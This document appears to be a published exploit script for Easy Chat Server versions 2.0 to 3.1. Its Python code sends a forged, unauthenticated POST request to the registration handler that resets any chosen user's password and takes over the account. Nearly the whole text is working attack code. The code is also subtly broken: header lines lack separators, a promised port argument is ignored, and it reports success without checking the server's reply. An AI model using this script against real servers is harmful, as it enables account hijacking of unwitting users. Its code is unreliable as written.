# Exploit Title: Easy Chat Server Remote Password Reset # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Pre-Auth Remote Password Reset # Severity: Critical # ==================================================================================================== # Registeration page 'register.ghp' allows resetting ANY user's password. # Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account. # ==================================================================================================== # USAGE: python exploit.py ip port username password #!/usr/bin/python import os,sys,socket ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) socket.connect((ip , 80)) buffer = "POST /registresult.htm HTTP/1.1" buffer += "Host: 192.168.1.11" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" buffer += "Accept-Language: en-US,en;q=0.5" buffer += "Accept-Encoding: gzip, deflate" buffer += "Connection: close" buffer += "Content-Type: application/x-www-form-urlencoded" buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change" socket.send(buffer) socket.close() print "[#] Password Changed Successfully"